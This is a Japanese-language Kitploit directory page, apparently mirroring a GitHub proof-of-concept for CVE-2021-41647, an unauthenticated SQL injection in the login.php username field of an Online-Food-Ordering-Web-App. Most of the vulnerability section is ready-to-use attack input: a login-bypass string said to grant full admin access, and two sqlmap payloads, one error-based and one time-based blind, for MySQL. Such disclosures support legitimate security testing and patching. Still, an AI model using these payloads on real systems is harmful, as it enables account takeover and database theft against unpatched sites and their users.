Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2021-41647 | Kitploit
ツール/GitHubGitHub/mobiusbinary/cve-2021-41647
脆弱性分析エクスプロイトウェブアプリケーション悪用情報収集ペネトレーションテスト学習と教育
GitHubmobiusbinary/cve-2021-41647

CVE-2021-41647

リポジトリを見る
4年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2021-41647

CVE-2021-41647 Online-Food-Ordering-Web-App における SQL インジェクション

Online-Food-Ordering-Web-App は、認証なしのエラーベースおよび時間ベースのブラインド SQL インジェクション攻撃に対して脆弱です。 /login.php ページの username パラメータはユーザー入力をサニタイズしないため、攻撃者は簡単なバイパス技術を使用してログインを回避できます。

アプリケーションへのリンク

Online-Food-Ordering-Web-App

影響を受けるコンポーネントとパラメータ

URL: /login.php
PARAMETER: username

POC'S

ログインバイパスペイロード

ユーザーログインをバイパスして完全な管理アクセスを取得するには、username 入力フィールドにペイロードを入力します: user' or 1=1-- -

SQLMAP ペイロード

Parameter: username (POST Request) Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: username=test'||(SELECT 0x6d65686d WHERE 8694=8694 AND (SELECT 8639 FROM(SELECT COUNT(*),CONCAT(0x71626a7a71,(SELECT (ELT(8639=8639,1))),0x71766a7171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a))||'&password=asdfasdrf

Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: username=test'||(SELECT 0x6d6d6367 WHERE 7580=7580 AND (SELECT 4416 FROM (SELECT(SLEEP(5)))nUhT))||'&password=asdfasdrf

POC 画像が不鮮明な場合は、より良い解像度で読み込まれる GIF をクリックしてください。

POC

発見者

Jason Colyvas
MOBIUSBINARY
2021年9月20日

ツールをダウンロード